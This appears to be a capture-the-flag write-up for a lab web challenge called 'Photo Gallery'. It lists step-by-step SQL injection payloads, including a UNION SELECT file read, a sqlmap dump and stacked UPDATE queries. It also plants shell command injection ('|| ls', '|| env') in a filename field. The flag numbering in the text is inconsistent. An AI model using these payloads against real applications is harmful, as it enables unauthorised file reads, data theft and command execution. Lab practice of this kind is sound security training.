Photo Gallery

Flag 1)

• Start off by viewing the source and you will get id’s
• so lets view fetch?id=1 and you should see a direct image
• add an .1 to it ie: fetch?id=1.1 and it should error out
• but lets pass some sql commands to push an arbitrary file read, using UNION SELECT ‘file/adorable.jpg’ —
• This should drop the image information pay good attention to it and you will find another hint to this running the uwsgi-nginx-flash-docker.
• Change the filename from file/adorable to uwsgi.ini as uwsgi will have an ini file for it’s config.
• Learn of the main file name from this config and use that instead of uwsgi.ini ie it should show main.py
• now review the main.py
• flag 0 found.

Flag 2)

• This one is easy, if you use Slackware like I have and installed the source package, you will need to drop the image from sqlmap using a blind injection
• sqlmap -u usr/fetch?id=1 –dump
• Flag 1 is found

Flag 3)

• Using remote code execution, rename image 3 to a new name call it test
• Command: fetch?id=1;UPDATE photos SET title=’test’ WHERE id=3;COMMIT;–
• broken image 3 is now named test
• Command 2:  fetch?id=1;UPDATE photos SET filename=’* || ls > test’ WHERE id=3;COMMIT;–
• this should now show after checking it again with fetch?id=1.1 UNION SELECT ‘test’ —
• command 3: fetch?id=1;UPDATE photos SET filename=’* || env > test’ WHERE id=3;COMMIT;–
• run this again fetch?id=1.1 UNION SELECT ‘test’ —
• all 3 flags are now found.  Flag 2 is the last one.